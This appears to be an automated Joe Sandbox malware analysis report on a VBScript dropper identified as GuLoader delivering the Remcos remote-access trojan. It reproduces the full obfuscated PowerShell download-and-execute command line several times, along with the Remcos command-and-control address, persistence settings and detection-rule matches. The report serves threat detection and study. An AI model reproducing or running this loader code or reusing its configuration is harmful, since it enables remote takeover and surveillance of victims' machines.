Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Sublabially.vbs

Overview

General Information

Sample name:Sublabially.vbs
Analysis ID:1576526
MD5:c4189a98b8eda94cb6632e57fe824155
SHA1:0455b4277f9ad2e1ed9d6349c9459a843ddf5dff
SHA256:9ab13f3f467c2ee1421b70d642789f7ee63bdf94841bd612e5ffa44c041a9a45
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7448 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJoseaS ilsQuesetoup] U b= de $ProtAPrv.dMa nkKontoShorm Gu.s L,gtFa thtolkaCemevIlteeUnder C.se Altn');$Noncorruptible=Astroite 'Demo$Sv.rDReraiSpejfA enf EkseFussr gnaeLexinMetatA teiHou aAfsk.Rea.DSpr oLejewInapnDa,blDi qoCowhaSentdDe,aFOptnitotalDefoe,ami(Exoc$Phr,AtheoaFestnGenndT hosGentaSpolrHjlpi rtesSkumttairoLinak athr EmoaW ittLtgbe defnMedhs Yoy,Prob$ RekWFor hHa voMutoo Ga,p,keleHumrrvanis ,yd)';$Whoopers=$Cissel;Forvanskende (Astroite 'R se$Ma igPus ltocho SlgB esa RokLSpl,:Avi e BerM GodA raklKla JStadR Po eCamaRIdylnAtmoeLeas=Indr(EnfetPer e BraSKolltUopd- Gh pForea U,lt PriH Res Cor,$Tot.w PenhIsocOInteodaispDi sEBigaRCholsDugd)');while (!$Emaljrerne) {Forvanskende (Astroite 'Cond$Aracg,edelProjo .ocbGiftaLaurlRigs: Tand HypeSubiuTe,rtP rkeCoatrRdesoB ffeFly lFyraa Va.ssprntNonpo C msA soeOldd=.loa$LystT.urneStabkSpndsFamitVealaUb snChonmDatarun ekSrsknEmb,icelen SkigSprgeIns.nAtoms') ;Forvanskende $Noncorruptible;Forvanskende (Astroite 'Tr.kSSunnTF ssaPar RBlotTSumm-F.gmsV olLPer,eBemaeIndiP Kam Indf4');Forvanskende (Astroite 'Pr,s$AarsGEftelAfshOKalob MulaBunklFo.k:carpEencoMDecyaC tolNonlJKandrBetaeVerdrRisin ExcEDamp=Para(DipatTr feWarrsInviTKlap- WeipUnspABr,lTDkfaH irs Omkl$Gr sW d ahPateOH fto ufPSepaEKde rForfSRick)') ;Forvanskende (Astroite 'Prof$Sol.g ExtLs dhOAra BSommABaluLPlad: nsF reco .slLareodJ.wsESamodPalmRGlooSHemm=Qua.$ oligradiLSkabOord bKaboARaptLPdag:CultePersA,emiSIndiTColuEElecdAnch+Unmi+Anoi% esu$Pantg nfiRSlutaC,tem nbeMAm.ho.ietfsquao Ch NmaniENy iRDis sGe n.AmniC SploHonoU BrenAntiT') ;$Aandsaristokratens=$Grammofoners[$Foldedrs]}$Drslagenes=312252;$Naturaliseringer=30375;Forvanskende (Astroite ' Cap$fo sgEfteLhyd oSh iBUdenA ColLOtte:TerrI remDUdbiEForhp De oBrndSOgleEN,nvrlame La t=Inte Paneg C ae Dists ld-Ro tCKonsoPodoNGynoTIndkELuthn SnetT ed Ind$ForsWbo rhT.inowineoAft p darEDr arB rgS');Forvanskende (Astroite 'Arc.$.olegBetalNa no ansbRecaaudsalNigr:F coG Blol CloaUnsusBeskpKalvuStadsSkrptT ykeNoddrOcelnBindeTi.m samm=Mis Ti b[La,oSErhvyMosts,midt OrieParcmAd p.KvadCExpeoUordn tomvRec eTrafrsty tSkud]mine:U,fo: SogFSel rLynioBoatmExtrBJaf aP itsV jkel xe6Hem 4LikeSChatt alarMedliLimbnActigM rl(Firm$HalviA.dedTrice ccp Seno apsssca eForbrGeop)');Forvanskende (Astroite 'Spat$nordGEvanlHowsoR asbPeroAUni l Gre: NotAKontd IndEfilbN.mpoo SveideceDGlu IFlu,stuneM gri Exe,= ttt Ga.e[EbliSKrityAdelS D.aT Y.geH rrM A l.CagptI dgEChemXUnclTSe i.InvoeMargn InvCTrkko SaxDMattISystnBordG on] Tea:Abol:Ung.aSsatS Il CAutoiPe,siLexi.SterGTa eERa eTSubcs gi TJokeRBathI nthNSkylGOper( np$QuaiG H sLBageadexisTrinPTrb,UAd,eSAs nt UndEGalaRFoliNadskE W n)');Forvanskende (Astroite 'Bill$SmedgTurnL FulosmutB Reia.etrLScro: YppiCakiNS euTNonteAlburfornIMermmglebsKunsBFortePoseV musiRec,SOrneE,overItalSBrig= Run$PinoaCorodStraERekon regoLni IIdy D G diSpuls HetM F r.MennsHjrnuRehybUnp sUnfoTE rir Musi StoNbeskGA ay(Barm$SptmDUforRE,teSSandlArbeaExeng M,lEBe knSkilELukkSIden,Iceb$ AnonInteAAfbeTItyluSub rStudaU palAfv.I RomSSejlEP,tarPosiItr pNCe tgEnt,EMagyRUnag)');Forvanskende $interimsbevisers;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7824 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJoseaS ilsQuesetoup] U b= de $ProtAPrv.dMa nkKontoShorm Gu.s L,gtFa thtolkaCemevIlteeUnder C.se Altn');$Noncorruptible=Astroite 'Demo$Sv.rDReraiSpejfA enf EkseFussr gnaeLexinMetatA teiHou aAfsk.Rea.DSpr oLejewInapnDa,blDi qoCowhaSentdDe,aFOptnitotalDefoe,ami(Exoc$Phr,AtheoaFestnGenndT hosGentaSpolrHjlpi rtesSkumttairoLinak athr EmoaW ittLtgbe defnMedhs Yoy,Prob$ RekWFor hHa voMutoo Ga,p,keleHumrrvanis ,yd)';$Whoopers=$Cissel;Forvanskende (Astroite 'R se$Ma igPus ltocho SlgB esa RokLSpl,:Avi e BerM GodA raklKla JStadR Po eCamaRIdylnAtmoeLeas=Indr(EnfetPer e BraSKolltUopd- Gh pForea U,lt PriH Res Cor,$Tot.w PenhIsocOInteodaispDi sEBigaRCholsDugd)');while (!$Emaljrerne) {Forvanskende (Astroite 'Cond$Aracg,edelProjo .ocbGiftaLaurlRigs: Tand HypeSubiuTe,rtP rkeCoatrRdesoB ffeFly lFyraa Va.ssprntNonpo C msA soeOldd=.loa$LystT.urneStabkSpndsFamitVealaUb snChonmDatarun ekSrsknEmb,icelen SkigSprgeIns.nAtoms') ;Forvanskende $Noncorruptible;Forvanskende (Astroite 'Tr.kSSunnTF ssaPar RBlotTSumm-F.gmsV olLPer,eBemaeIndiP Kam Indf4');Forvanskende (Astroite 'Pr,s$AarsGEftelAfshOKalob MulaBunklFo.k:carpEencoMDecyaC tolNonlJKandrBetaeVerdrRisin ExcEDamp=Para(DipatTr feWarrsInviTKlap- WeipUnspABr,lTDkfaH irs Omkl$Gr sW d ahPateOH fto ufPSepaEKde rForfSRick)') ;Forvanskende (Astroite 'Prof$Sol.g ExtLs dhOAra BSommABaluLPlad: nsF reco .slLareodJ.wsESamodPalmRGlooSHemm=Qua.$ oligradiLSkabOord bKaboARaptLPdag:CultePersA,emiSIndiTColuEElecdAnch+Unmi+Anoi% esu$Pantg nfiRSlutaC,tem nbeMAm.ho.ietfsquao Ch NmaniENy iRDis sGe n.AmniC SploHonoU BrenAntiT') ;$Aandsaristokratens=$Grammofoners[$Foldedrs]}$Drslagenes=312252;$Naturaliseringer=30375;Forvanskende (Astroite ' Cap$fo sgEfteLhyd oSh iBUdenA ColLOtte:TerrI remDUdbiEForhp De oBrndSOgleEN,nvrlame La t=Inte Paneg C ae Dists ld-Ro tCKonsoPodoNGynoTIndkELuthn SnetT ed Ind$ForsWbo rhT.inowineoAft p darEDr arB rgS');Forvanskende (Astroite 'Arc.$.olegBetalNa no ansbRecaaudsalNigr:F coG Blol CloaUnsusBeskpKalvuStadsSkrptT ykeNoddrOcelnBindeTi.m samm=Mis Ti b[La,oSErhvyMosts,midt OrieParcmAd p.KvadCExpeoUordn tomvRec eTrafrsty tSkud]mine:U,fo: SogFSel rLynioBoatmExtrBJaf aP itsV jkel xe6Hem 4LikeSChatt alarMedliLimbnActigM rl(Firm$HalviA.dedTrice ccp Seno apsssca eForbrGeop)');Forvanskende (Astroite 'Spat$nordGEvanlHowsoR asbPeroAUni l Gre: NotAKontd IndEfilbN.mpoo SveideceDGlu IFlu,stuneM gri Exe,= ttt Ga.e[EbliSKrityAdelS D.aT Y.geH rrM A l.CagptI dgEChemXUnclTSe i.InvoeMargn InvCTrkko SaxDMattISystnBordG on] Tea:Abol:Ung.aSsatS Il CAutoiPe,siLexi.SterGTa eERa eTSubcs gi TJokeRBathI nthNSkylGOper( np$QuaiG H sLBageadexisTrinPTrb,UAd,eSAs nt UndEGalaRFoliNadskE W n)');Forvanskende (Astroite 'Bill$SmedgTurnL FulosmutB Reia.etrLScro: YppiCakiNS euTNonteAlburfornIMermmglebsKunsBFortePoseV musiRec,SOrneE,overItalSBrig= Run$PinoaCorodStraERekon regoLni IIdy D G diSpuls HetM F r.MennsHjrnuRehybUnp sUnfoTE rir Musi StoNbeskGA ay(Barm$SptmDUforRE,teSSandlArbeaExeng M,lEBe knSkilELukkSIden,Iceb$ AnonInteAAfbeTItyluSub rStudaU palAfv.I RomSSejlEP,tarPosiItr pNCe tgEnt,EMagyRUnag)');Forvanskende $interimsbevisers;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["154.216.18.216:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-7K8JAD", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.1748100726.0000000008700000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000007.00000002.2649817843.0000000006C6F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.2649989202.0000000006CAA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.1748291655.000000000994F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000005.00000002.1728698519.0000000005995000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 6 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7536.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_7824.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa823:$b2: ::FromBase64String(
              • 0x98a8:$s1: -join
              • 0x3054:$s4: +=
              • 0x3116:$s4: +=
              • 0x733d:$s4: +=
              • 0x945a:$s4: +=
              • 0x9744:$s4: +=
              • 0x988a:$s4: +=
              • 0x138c1:$s4: +=
              • 0x13941:$s4: +=
              • 0x13a07:$s4: +=
              • 0x13a87:$s4: +=
              • 0x13c5d:$s4: +=
              • 0x13ce1:$s4: +=
              • 0xa0cb:$e4: Get-WmiObject
              • 0xa2ba:$e4: Get-Process
              • 0xa312:$e4: Start-Process
              • 0x14545:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", ProcessId: 7448, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 172.67.210.11, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8088, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49815
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sublabially.vbs", ProcessId: 7448, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$handsaws='Underhive';;$Hjlpevinduernes='genernrr';;$Skovspurvenes='Folkekre';;$Fremsende='Peddigrrets';;$kbelysten=$host.Name; function Astroite($Moedt){If ($kbelysten) {$Potheen='Madelines214';$Spildendes=4;$Racketlike=$Spildendes}do{$Harpers+=$Moedt[$Racketlike];$Racketlike+=5} until(!$Moedt[$Racketlike])$Harpers}function Forvanskende($Piphas119){ .($criminologist) ($Piphas119)}$Redefinerende=Astroite 'vascnVer,e roeT Oto.UhyrW';$Redefinerende+=Astroite 'charEmel,B Si,CAnetL skiIbreceFeltNK.ont';$Adkomsthaveren=Astroite 'ChepMUnwooK lizRangiLattlst nl Cena Pom/';$knippelgodes=Astroite ' nkT Es lLei s Vit1Plat2';$Grillhandske='Corv[ StanAnlgE inatHjti.OpkasForseF rsR,ineVRudlICo tCBareESlu P SkyoPhotiTendNRealtBr dM UndAUdvanFo fABombG Br e Gr RFol ]Mu,f:Upwe: Il,SGoodeUkolc emuF emRSt mIErraTInteySup.pBen.RPatiO GentUndrOAn yCKlonODia lTi.s= up$s rakM.ndn Acti D.sPKolopRa ie PrsL oweGFlasOByggd V.lEIndfS';$Adkomsthaveren+=Astroite 'Un,a5Hum .Fis.0Bill ,and(Ov rWBoobiKernn MosdB rtoSlotw BoosHand BypNRe,gTpent Re y1Fork0Fa n.Ausp0over; F.n MussW Efti Carn.dea6Neur4Ophi; Syl Wi.dxBhin6Pinm4Cama;Mo,b Drosr F rvQuad:sket1Tot 3Hous1Indg. La 0Urop) Ger GennGonyceT.gtc prokUne o Ind/skal2Josi0Pins1 Ord0Fu o0 Frm1Ov r0P op1Aeg. CyklF,fpaiCombrTeate UndfStyloDef x Spa/ g s1Orch3 mo,1 Men.dato0';$Racketlikenddateringsfase=Astroite ' .utUUnmuSConse F eR Fo - Raca S rGSta.eMor,n verT';$Aandsaristokratens=Astroite 'DoblhUndetSa dtStrapAntesS mm:Skru/opsl/ Timi frugClep2RentcOr,h.KlapiAtelc Ancu Tra/KludZDopitComby groSBiorv.ctuRBystyL ngzSeis/ RevBMblelTrvluHemisGrimt AppeoverrRinkeRhinrDiff.Dor dSpadeSkarpsodfl Como enzy';$Tryksager=Astroite ' elm>';$criminologist=Astroite 'Hulli BonEBat.x';$Lnindkomsts='Noncontingency';$breadbox='\misinforms.Non';Forvanskende (Astroite ' Skr$Rm bgSv nLparaoTappBMa uAU melBema:FaktcShrii hosFllesbehaEOpunlPuin= Und$Uns.ESandnIntoVDien:Jac AUn epCullpKammdAnglAElektPs uA Sub+Fo n$ EskBSubsrBarneThora PlaDDepeB D mOSni X');Forvanskende (Astroite ' an$Sprog.krsLSti OKlieBRefaAB.ggL A.k:Subcg RumRChowA RekMU deMChicONeooFAfveoParan MokEMicrRS agSPely=Baz $F,beAOutwAJab,NNaphDTrres EagA cykRObseICop,SHkketEntiOPennk TypRKlynaEdapt inge.jern dsmSOutw. Va,SsubdPVerdLUnsiINa sT Fry( Ski$spectS lvR ssiy.rank Bars Teka hangKemie raR Cal)');Forvanskende (Astroite $Grillhandske);$Aandsaristokratens=$Grammofoners[0];$Couloir4=(Astroite ',obb$SurnGPublL BikoSupebBazeAFantl lin: rinDStibi,ornf A hfhalmECongRHeadE UdrNUdebTCohaiundeaUnth= ,erNCedae DoyWSkil- DiboB,dgbF rrjM skE eluc afht Udr WatSunmoYDhfpSTribTEctoeCaroMhyst. Ven$SvarRS weeskylD ouseUnexfOpunIDissN dviE B kr rane,arsNKa tdu dee');Forvanskende ($Couloir4);Forvanskende (Astroite ' Moo$ yloD Bu,i.obbfAandfSonneTartr .ydeSkafnL,svt SyriUnivaFio . enHSexte.neoaSchfdUdgieEjerrGemisSemi[ti m$ AgrR rkba Forc Klukkerme ,nttO,idl Unsi.riuk I le S.hn valdLdredButuaOmprtP kteRe orRegiifjten ResgStrosTweefJo

              Stealing of Sensitive Information

              barindex
              Sigma detected: Remcos
              Source: Registry Key setAuthor: Joe Security: Data: Details: F6 D9 F9 01 8F BC 7D 88 8A C0 4F 4E 28 1D 60 D6 04 B7 A4 2D C8 1F 38 A3 F2 36 66 57 7D 18 72 E2 E9 6B B9 93 04 47 D0 F2 62 EA 6E 13 DD 23 D4 5F 7D 4A C0 D4 C3 79 F4 AE 21 C3 40 A0 FF DA AD D9 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 8088, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-7K8JAD\exepath

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T08:29:21.022618+010020365941Malware Command and Control Activity Detected192.168.2.949973154.216.18.2162404TCP
              2024-12-17T08:30:42.265024+010020365941Malware Command and Control Activity Detected192.168.2.949826154.216.18.2162404TCP
              2024-12-17T08:31:05.313531+010020365941Malware Command and Control Activity Detected192.168.2.949877154.216.18.2162404TCP
